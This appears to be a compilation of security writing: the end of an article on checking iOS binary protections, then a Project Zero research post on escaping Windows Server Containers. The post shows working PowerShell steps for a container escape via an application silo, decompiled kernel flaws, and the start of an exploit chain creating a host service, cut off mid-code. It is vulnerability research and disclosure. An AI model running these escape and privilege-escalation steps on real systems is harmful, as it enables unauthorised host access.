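MH_MAGIC_64 = 0xFEEDFACF  # thin 64-bit, little-endian Mach-O
MH_PIE = 0x200000         # from mach-o/loader.h

def is_pie(path: str) -> bool:
    # struct mach_header_64: magic, cputype, cpusubtype, filetype,
    # ncmds, sizeofcmds, flags, reserved -- eight 32-bit fields.
    with open(path, "rb") as f:
        header = f.read(32)
    if len(header) < 32:
        raise ValueError("file too small to be a Mach-O binary")
    fields = struct.unpack("<8I", header)
    if fields[0] != MH_MAGIC_64:
        raise ValueError("not a thin 64-bit little-endian Mach-O file")
    return bool(fields[6] & MH_PIE)  # flags field
```

A complete tool would also handle fat (multi-architecture) files and other magics; checksec.sh and rabin2, mentioned later, do that for you.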
arc Unlike PIE, the check for whether Automatic Reference Counting (ARC) is enabled is not based on a flag in the header. Instead, this check is something we infer based on the imports a binary has. There is a lot of information about ARC in the LLVM documentation here, but basically it’s a memory-safety mechanism that keeps tabs on objects and frees them when no one is using them anymore. This is not something that happens at load time like PIE, but instead happens at runtime. To detect if ARC is being used, we check if the function objc_release is imported by the target executable. We simply infer that ARC is used based on this; the import does not prove that it is. This check could easily be fooled by anything that imports the function but does not actually use it, so keep that in mind. With the macho package we simply call imports.has("objc_release") for the check. canary Checking if stack canaries are in use is done in a similar fashion to ARC. When enabled, a stack canary is a random bit of data placed on the stack and checked before a function returns, aimed at making overflows harder to exploit. The use of the function __stack_chk_fail (and its derivatives) implies that, should a stack canary be smashed, this function would be called as a safety bailout to prevent an exploitation attempt from returning to the wrong address (or similar). Just like ARC, if stack canaries weren’t enabled but this function was imported for other reasons, the check could be fooled. To recap, it simply infers that stack canaries are enabled based on the fact that a commonly used function is imported, not that it’s actually used. static analysis Using objection to check these protections is not the only way. Many scripts, plugins and other tools exist that do these checks. For example: https://github.com/slimm609/checksec.sh. Radare2 also has this capability, such as when using rabin2 or the ia command in the r2 disassembler.
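The import-based inference described above condenses to a few lines. Feed it the undefined symbols of a binary (from `nm -u` or `rabin2 -i` output, for example); the symbol spellings below are a best-effort set, since underscore prefixes vary by toolchain.

```python
def infer_protections(imports: set) -> dict:
    # Presence of these imports only *suggests* the protection is in
    # use -- an unused import would fool the check, exactly as the
    # article warns.
    return {
        "arc": any(s.lstrip("_") == "objc_release" for s in imports),
        "canary": any("stack_chk_fail" in s for s in imports),
    }

print(infer_protections({"_objc_release", "___stack_chk_fail", "_printf"}))
```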
rabin2 used to enumerate macho flags and imports checking if stack canaries are enabled using r2 the nuances Now that you know how these binary protection mechanisms are enumerated, let’s talk about when you may have trouble interpreting the results, like I did. In the iOS world today you are going to find applications written in Objective-C, Swift or both, and depending on the language used, different protections apply. Even “write once, deploy anywhere” frameworks such as Cordova have native components. None of these protections are applicable to the extra layers that frameworks like Cordova (read: JavaScript) add on top of the native layer, so you can just ignore those. Certain protections are also only applicable to the main executable and none of the frameworks. Knowing which files need protections enabled is also important. Let’s take a quick look at a typical iOS application. The .ipa file can be unzipped to find a Payload/ directory, and in there a folder with a name usually ending in .app. Inside this directory you’d typically find the main application executable (DVIA-v2 in the example below) and a Frameworks/ directory. The main executable, as well as the executables found in the Frameworks directory, are all in scope for protections. executables highlighted with red arrows There may also be arbitrary .dylib files lying around (not necessarily in the Frameworks directory), so be sure to check them out too. identifying objc vs swift Some protections will only be applicable depending on the language the main executable or framework is written in. In general, all of the protections should be enabled for Objective-C, but some are not (and it seems you can’t enable them anyway) for Swift. Knowing how to identify a pure Objective-C or Swift library is also important. In general you can spot this by looking at the executable’s symbol table. A pure Objective-C executable or library will have no Swift references.
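That symbol-table heuristic is easy to script. The prefixes below come from the indicators discussed here (the _swift_FORCE_LOAD_ marker and Swift-mangled symbols); treat them as a heuristic signal, not proof either way.

```python
def looks_like_swift(symbols) -> bool:
    # Heuristics from the article: _swift_FORCE_LOAD_ markers and
    # Swift-mangled ("_$s"-prefixed) symbols. Their absence does not
    # prove pure Objective-C, but their presence is a strong signal
    # that Swift is at least in use.
    return any(
        s.startswith("_swift_FORCE_LOAD_") or s.startswith("_$s")
        for s in symbols
    )

print(looks_like_swift({"_swift_FORCE_LOAD_$_swiftCore", "_objc_msgSend"}))
```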
no swift imports in the Realm executable swift references in the RealmSwift executable. Take special note of the _swift_FORCE_LOAD_ prefix. This is a pretty clear indicator that Swift is at the very least in use. An experienced eye will also be able to spot Swift-mangled methods in the symbol table, which won’t exist in a pure Objective-C binary. The only case that is hard to detect is a pure Swift binary. Even if written in pure Swift, there are always some references to Objective-C around. You can almost always see this when inspecting the linked libraries. libobjc linked in a Swift library built with Xcode Even when compiling a pure Swift file on macOS, libobjc shows its head! simple hello world swift program linking libobjc Out of interest I compiled the same program on Linux using the Swift tools for Linux, and there was no libobjc. swift program compiled on Linux not linked to libobjc Anyway, my point is that it’s really hard to be certain that an application is written in pure Swift, and you should be careful when considering how binary protections are enumerated for them. Let’s take a look at some of the exceptions to these protections. pie – exceptions PIE is only applicable to executables (Mach-O type MH_EXECUTE) and not libraries. A reference to this can be seen in a comment in the Mach-O loader source header here (formatted for readability). #define MH_PIE 0x200000 /* When this bit is set, the OS will load the main executable at a random address. Only used in MH_EXECUTE filetypes. */ So, if the binary is a library, PIE being false is OK. arc – exceptions There are no exceptions to ARC. Pure Objective-C, pure Swift and hybrid binaries should all have this enabled. Note that objection versions < 1.10.0 incorrectly parsed the check for ARC, but that has since been fixed in version 1.10.1. For old Objective-C projects this should be enabled. For Swift projects it should automatically be enabled. canary – exceptions Stack canaries are an interesting one.
For pure Objective-C binaries, this should always be enabled. Enabling it is done by passing the -fstack-protector-all flag to the C compiler. For pure Swift projects I could not find a way to enable this. In fact, I reduced testing to a single, small hello world example to see if I could get it enabled, but with no success.

stack canaries not enabled for swift binaries

I found this hard to believe, and thought maybe it would be different if I compiled it on Linux, but alas, the same result. Some digging led me to realise that “it’s complicated”. See: https://developer.apple.com/forums/thread/106300. The TL;DR is that it is in fact enabled, but conventional parsing is not enough to verify that without recompiling the source. Given that Swift is designed to be memory safe, making memory corruption bugs much harder to introduce, I feel comfortable that if a library is in fact pure Swift and stack canaries weren’t enabled, the risk is minimal.

In summary, your decision making on which protections can and should be enabled is heavily influenced by whether Swift is involved and whether the target binary is an executable or a library.

enabling protections summary

PIE – Add the -fPIC compiler flag to the project’s build settings. This is only applicable to the main executable.

ARC – Automatically enabled for Swift-only projects (via the swiftc compiler), and enabled for Objective-C by setting Objective-C Automatic Reference Counting to YES in the project’s configuration.

Canary – Enabled by adding the -fstack-protector-all compiler flag to Objective-C projects. If Swift is involved it’s possible to have it enabled when the library is a hybrid of Objective-C and Swift, but it could show as disabled, which is okay.

Special care should be taken to ensure that these configuration changes are applied to all frameworks in the project as well.

Source: https://sensepost.com/blog/2021/on-ios-binary-protections/
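Checkers typically answer the canary question by looking for the stack-protector support symbols among a binary’s imports. A small Python sketch of that convention, including the pure-Swift caveat discussed above (the function and parameter names are mine):

```python
def check_stack_canary(imported_symbols, is_pure_swift=False):
    """Sketch of the conventional canary check: look for the
    stack-protector support symbols among the binary's imports."""
    canary_syms = {"___stack_chk_guard", "___stack_chk_fail"}
    if canary_syms & set(imported_symbols):
        return "canary enabled"
    if is_pure_swift:
        # Per the discussion above, Swift's memory safety plus compiler
        # differences mean a missing canary symbol may be a false negative.
        return "canary not visible (possible false negative for pure Swift)"
    return "canary disabled"
```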
  11. Who Contains the Containers?

Posted by James Forshaw, Project Zero

This is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area.

Windows Containers Background

Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers, which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go into any depth on how containers work in Linux, as very little of it is applicable to Windows.

The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container, which uses a feature of the Windows kernel called a Server Silo that allows for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object which can be assigned to a process.

The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily, as any system or OS differences can be hidden. For example, the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization, and the application shouldn’t be able to tell the difference.
Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications. Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host. There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system. Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well. The current MSRC security servicing criteria states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers meaning an escape is still useful as part of a chain. As Windows Server Containers are not a security boundary any bugs in the feature won’t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be. 
Origins of the Research

Over a year ago I was asked for some advice by Daniel Prizmant, a researcher at Palo Alto Networks, on some details around Windows object manager symbolic links. Daniel was doing research into Windows containers, and wanted help on a feature which allows symbolic links to be marked as global, which allows them to reference objects outside the server silo. I recommend reading Daniel’s blog post for more in-depth information about Windows containers. Knowing a little bit about symbolic links, I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is that the user in the container can access resources outside of the container, such as files.

The global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done more easily, without injection. You could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on Github.

Fast forward another few months, and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible. Microsoft had not patched the issue and it was still exploitable. They hadn’t patched it because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations.
One proposed mitigation was to enforce the containers to run under the ContainerUser account instead of ContainerAdministrator. As the reported issue only works when running as an administrator, that would seem to be sufficient. However, I wasn’t convinced there weren’t similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks. While I wasn’t expecting MS to fix anything I found, it would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It also establishes a rough baseline of the risks involved in using Windows Server Containers. It’s known to be problematic, but how problematic?

Research Process

The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container.

Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper.

Realistically it’s best to just use Docker, which takes the MS-provided Go wrapper and implements the more familiar Docker CLI. While there’s likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft so would be in scope. Note, there are two versions of Docker: Enterprise, which is only for server systems, and Desktop. I primarily used Desktop for convenience.
As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However, Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group, you can use that to get full administrator privileges by abusing Docker’s server silo support.

Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:

FROM mcr.microsoft.com/windows/servercore:20H2
USER ContainerUser
COPY NtObjectManager c:/NtObjectManager
CMD [ "powershell", "-noexit", "-command", \
 "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default. Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image.

Create a directory and copy the contents of the docker file to the filename dockerfile in that directory.
Also copy in a copy of my PowerShell module into the same directory under the NtObjectManager directory. Then in a command prompt in that directory run the following commands to build and run the container.

C:\container> docker build -t test_image .
Step 1/4 : FROM mcr.microsoft.com/windows/servercore:20H2
 ---> b29adf5cd4f0
Step 2/4 : USER ContainerUser
 ---> Running in ac03df015872
Removing intermediate container ac03df015872
 ---> 31b9978b5f34
Step 3/4 : COPY NtObjectManager c:/NtObjectManager
 ---> fa42b3e6a37f
Step 4/4 : CMD [ "powershell", "-noexit", "-command", "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]
 ---> Running in 86cad2271d38
Removing intermediate container 86cad2271d38
 ---> e7d150417261
Successfully built e7d150417261
Successfully tagged test_image:latest

C:\container> docker run --isolation=process -it test_image
PS>

I wanted to run code using process isolation rather than Hyper-V isolation, so I needed to specify the --isolation=process argument. This would allow me to more easily see system interactions, as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation.

I now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.

PS> Get-Process -Name CExecSvc

Handles  NPM(K)  PM(K)  WS(K)  CPU(s)    Id  SI ProcessName
-------  ------  -----  -----  ------    --  -- -----------
     86       6   1044   5020          4560   6 CExecSvc

With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’s token, just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that.
PS> Show-NtTokenEffective -User -Group -Privilege
USER INFORMATION
----------------
Name                       Sid
----                       ---
User Manager\ContainerUser S-1-5-93-2-2

GROUP SID INFORMATION
-----------------
Name                                   Attributes
----                                   ----------
Mandatory Label\High Mandatory Level   Integrity, ...
Everyone                               Mandatory, ...
BUILTIN\Users                          Mandatory, ...
NT AUTHORITY\SERVICE                   Mandatory, ...
CONSOLE LOGON                          Mandatory, ...
NT AUTHORITY\Authenticated Users       Mandatory, ...
NT AUTHORITY\This Organization         Mandatory, ...
NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ...
LOCAL                                  Mandatory, ...
User Manager\AllContainers             Mandatory, ...

PRIVILEGE INFORMATION
---------------------
Name                          Luid              Enabled
----                          ----              -------
SeChangeNotifyPrivilege       00000000-00000017 True
SeImpersonatePrivilege        00000000-0000001D True
SeCreateGlobalPrivilege       00000000-0000001E True
SeIncreaseWorkingSetPrivilege 00000000-00000021 False

The groups didn’t seem that interesting, however looking at the privileges we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system, including administrators. MSRC considers having SeImpersonatePrivilege to be administrator-equivalent, meaning if you have it you can assume you can get to administrator. It seems ContainerUser is not quite as normal as it should be.

That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However, that turns out to not be the case in practice. As an example, you can use the public RogueWinRM exploit to get a SYSTEM token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker.

Next, I used the NtObject drive provider to list the object manager namespace.
For example, checking the Device directory shows what device objects are available.

PS> ls NtObject:\Device
Name                                              TypeName
----                                              --------
Ip                                                SymbolicLink
Tcp6                                              SymbolicLink
Http                                              Directory
Ip6                                               SymbolicLink
ahcache                                           SymbolicLink
WMIDataDevice                                     SymbolicLink
LanmanDatagramReceiver                            SymbolicLink
Tcp                                               SymbolicLink
LanmanRedirector                                  SymbolicLink
DxgKrnl                                           SymbolicLink
ConDrv                                            SymbolicLink
Null                                              SymbolicLink
MailslotRedirector                                SymbolicLink
NamedPipe                                         Device
Udp6                                              SymbolicLink
VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink
KsecDD                                            SymbolicLink
DeviceApi                                         SymbolicLink
MountPointManager                                 Device
...

Interestingly most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects, but there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There’s likely to be some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.

What about the registry? The container should be providing its own registry hives, so there shouldn’t be anything accessible outside of that. After a few tests I noticed something very odd.

PS> ls HKLM:\SOFTWARE | Select-Object Name
Name
----
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Clients
HKEY_LOCAL_MACHINE\SOFTWARE\DefaultUserEnvironment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
HKEY_LOCAL_MACHINE\SOFTWARE\ODBC
HKEY_LOCAL_MACHINE\SOFTWARE\OpenSSH
HKEY_LOCAL_MACHINE\SOFTWARE\Policies
HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications
HKEY_LOCAL_MACHINE\SOFTWARE\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node

PS> ls NtObject:\REGISTRY\MACHINE\SOFTWARE | Select-Object Name
Name
----
Classes
Clients
DefaultUserEnvironment
Docker Inc.
Intel
Macromedia
Microsoft
ODBC
OEM
OpenSSH
Partner
Policies
RegisteredApplications
Windows
WOW6432Node

The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider.
The second command is using my module’s object manager provider to list the same hive. If you look closely, the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:

PS> ls NtObject:\REGISTRY\USER | Select-Object Name
Name
----
.DEFAULT
S-1-5-19
S-1-5-20
S-1-5-21-426062036-3400565534-2975477557-1001
S-1-5-21-426062036-3400565534-2975477557-1001_Classes
S-1-5-21-426062036-3400565534-2975477557-1003
S-1-5-18

PS> Get-NtSid
Name                       Sid
----                       ---
User Manager\ContainerUser S-1-5-93-2-2

No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2; you’d expect to see a loaded hive for that user SID. However you don’t see one, instead you see S-1-5-21-426062036-3400565534-2975477557-1001 which is the SID of the user outside the container. Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bug with application hives where you couldn’t open the \REGISTRY\A attachment point directly, but you could if you opened \REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive. This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’s access check. You could imagine the host storing some important data in the registry which the container can now read out; however, using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host’s registry hives.
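The relative-versus-absolute open behavior can be modelled in a few lines. This is purely a conceptual sketch of the bug class, not the Windows implementation; none of the names below are real APIs:

```python
# The host registry is a tree, and the silo installs an overlay that
# absolute opens are supposed to consult instead of the real hive.
host_root = {
    "SOFTWARE": {"Docker Inc.": {}, "Intel": {}, "Microsoft": {}},
}
silo_overlay = {
    "SOFTWARE": {"Classes": {}, "Microsoft": {}},
}

def open_key_absolute(path):
    """Absolute open: resolves the full path and honours the overlay."""
    node = silo_overlay
    for part in path.split("\\"):
        node = node[part]
    return node

def open_key_relative(parent, name):
    """Buggy relative open: resolves against the handle it was given
    and never re-checks the overlay, exposing the host's keys."""
    return parent[name]
```

An absolute open of SOFTWARE only shows the overlay’s keys, while a relative open from a handle to the real root reaches the host’s keys (such as “Docker Inc.”), mirroring the difference between the two listings above.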
The fact that I had two bugs in less than a day was somewhat concerning; however, at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.

A Little Bit of Reverse Engineering

While just doing basic inspection had been surprisingly fruitful, it was likely that some reverse engineering would be needed to shake out anything else. I know from previous experience with Desktop Bridge how the registry overlays and object manager redirection work when combined with silos. In the case of Desktop Bridge it uses application silos rather than server silos, but they go through similar approaches. The main enforcement mechanism used by the kernel to provide the container’s isolation is calling a function to check whether the process is in a silo and doing something different based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You’d think the kernel would only have a few functions which would return the current silo state.
Unfortunately you’d be wrong; the following is a short list of the functions I checked:

IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo

Of course that’s not a comprehensive list of functions, but those are the ones that looked most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn’t going to be comprehensive either, for various reasons:

- We’re only checking for bad checks, not the lack of a check.
- The kernel has the structure type definition for the Job object which contains the silo, so the call could easily be inlined.
- We’re only checking the kernel; many of these functions are exported for driver use, so they could be called by other kernel components that we’re not looking at.

The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink, which is the function responsible for enforcing symbolic link checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive.
For example, if you put a symbolic link in the current user’s hive which redirects to the local machine hive, CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.

BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) {
    if (PsIsCurrentThreadInServerSilo()
        || !TargetHive
        || TargetHive == SourceHive) {
        return TRUE;
    }

    if (SourceHive->Flags.Trusted)
        return FALSE;

    // Check trust list.
}

Looking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check, so it is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted, so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added.

To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it’s not documented). When setting the configuration, Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive, allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue, but I didn’t investigate too deeply.
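To make the control flow explicit, here is a small Python model of the decompiled logic above (the trust-list walk is reduced to an opaque callback, and all the names are mine):

```python
def cmp_ok_to_follow_link(in_server_silo, source_hive, target_hive,
                          passes_trust_check):
    """Model of CmpOKToFollowLink's structure: the server-silo test
    comes first, so inside a container every symbolic link is followed
    and the trust check below is never reached."""
    if in_server_silo or target_hive is None or target_hive is source_hive:
        return True  # the bug: trust is never consulted in a server silo
    # Outside a silo the normal hive trust rules apply (simplified here).
    return passes_trust_check(source_hive, target_hive)
```

With a trust check that always denies, the link is still followed whenever the thread is in a server silo, which is exactly the bypass described above.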
At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use the registry silo escape to write to the host registry.

The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function gets the root object manager namespace directory for a silo.

POBJECT_DIRECTORY OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(PEJOB Silo) {
    if (Silo) {
        PPSP_STORAGE Storage = Silo->Storage;
        PPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot];
        if (Slot->Present)
            return Slot->Value;
    }
    return ObpRootDirectoryObject;
}

We can see that the function will extract a storage parameter from the passed-in silo; if present, it will return the value of the slot. If the silo is NULL or the slot isn’t present, then the global root directory stored in ObpRootDirectoryObject is returned. When the server silo is set up, the slot is populated with a new root directory, so this function should always return the silo root directory rather than the real global root directory. This code seems perfectly fine: if the server silo is passed in, it should always return the silo root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough; there are only two callers and they both have the following code.

PEJOB silo = PsGetCurrentSilo();
Root = OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(silo);

Okay, so the silo is coming from PsGetCurrentSilo. What does that do?

PEJOB PsGetCurrentSilo() {
    PETHREAD Thread = PsGetCurrentThread();
    PEJOB silo = Thread->Silo;
    if (silo == (PEJOB)-3) {
        silo = Thread->Tcb.Process->Job;
        while (silo) {
            if (silo->JobFlags & EJOB_SILO) {
                break;
            }
            silo = silo->ParentJob;
        }
    }
    return silo;
}

A silo can be associated with a thread through impersonation, or it can be one of the jobs in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo.
If not, signified by the -3 placeholder, it searches the job hierarchy of the process for any job which has the JOB_SILO flag set. If a silo is found, it’s returned from the function; otherwise NULL is returned. This is a problem, as it’s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo: application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore, to trick the object manager into using the real root directory, all we need to do is:

1. Create an application silo.
2. Assign it to a process.
3. Fully access the root of the object manager namespace.

This is basically a more powerful version of the global symlink vulnerability, but requires no administrator privileges to function. Again, as with the registry issue, you’re still limited in what you can modify outside of the container based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system. The exploit in PowerShell is pretty straightforward using my toolchain:

PS> $root = Get-NtDirectory "\"
PS> $root.FullPath
\
PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory
PS> Set-NtProcessJob $silo -Current
PS> $root.FullPath
\Silos\748

To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory, the kernel makes it look like it is by returning a single backslash as the path. We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code trying to create a root directory, which we don’t want and can’t be done from a non-administrator account anyway. We can then assign the application silo to the process. Now we can check the root directory path again. We now find the root directory is really called \Silos\748 instead of just a single backslash.
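The interaction between the two decompiled routines can be modelled to show why the trick works. This is an illustrative Python model, not kernel code; the class and function names are my own:

```python
GLOBAL_ROOT = "\\"            # stands in for ObpRootDirectoryObject
EJOB_SILO = 0x1               # flag value is illustrative

class Job:
    def __init__(self, is_silo=False, root_dir=None, parent=None):
        self.flags = EJOB_SILO if is_silo else 0
        self.root_dir = root_dir   # the "slot" contents, if populated
        self.parent = parent

def get_current_silo(process_job):
    """Models PsGetCurrentSilo: walks the job hierarchy looking for ANY
    silo, server or application -- this is the flaw."""
    job = process_job
    while job:
        if job.flags & EJOB_SILO:
            return job
        job = job.parent
    return None

def get_silo_root_directory(silo):
    """Models OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO: falls back to the
    global root when the silo has no root-directory slot."""
    if silo and silo.root_dir is not None:
        return silo.root_dir
    return GLOBAL_ROOT

# A server silo has its slot populated at setup time...
server_silo = Job(is_silo=True, root_dir="\\Silos\\748")
# ...but an application silo created with no root directory does not,
# so nesting one inside the container leaks the real global root.
app_silo = Job(is_silo=True, root_dir=None, parent=server_silo)
```

With only the server silo in the hierarchy, lookups resolve to the silo root; once the rootless application silo is assigned, the innermost silo has no slot and the global root is returned instead.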
This is because the kernel is now using the real root directory. At this point you can access resources on the host through the object manager.

Chaining the Exploits

We can now combine these issues together to escape the container completely from ContainerUser. First get hold of an administrator token through something like RogueWinRM; you can then impersonate it due to having SeImpersonatePrivilege. Then you can use the object manager root directory issue to access the host’s service control manager (SCM) over its ALPC port and create a new service. You don’t even need to copy an executable outside the container, as the system volume for the container is an accessible device on the host which we can just access. As far as the host’s SCM is concerned you’re an administrator, so it’ll grant you full access to create an arbitrary service. However, when that service starts it’ll run on the host, not in the container, removing all restrictions.

One quirk which can make exploitation unreliable is that the SCM’s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service, you will end up accessing the container’s SCM, not the host’s. To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands.

PS> $imp = $token.Impersonate()
PS> $sym_path = "$env:SystemDrive\symbols"
PS> mkdir $sym_path | Out-Null
PS> $services_path = "$env:SystemRoot\system32\services.exe"
PS> $cmd = 'cmd /C echo "Hello World" > \hello.txt'
# You can also use the following to run a container based executable.
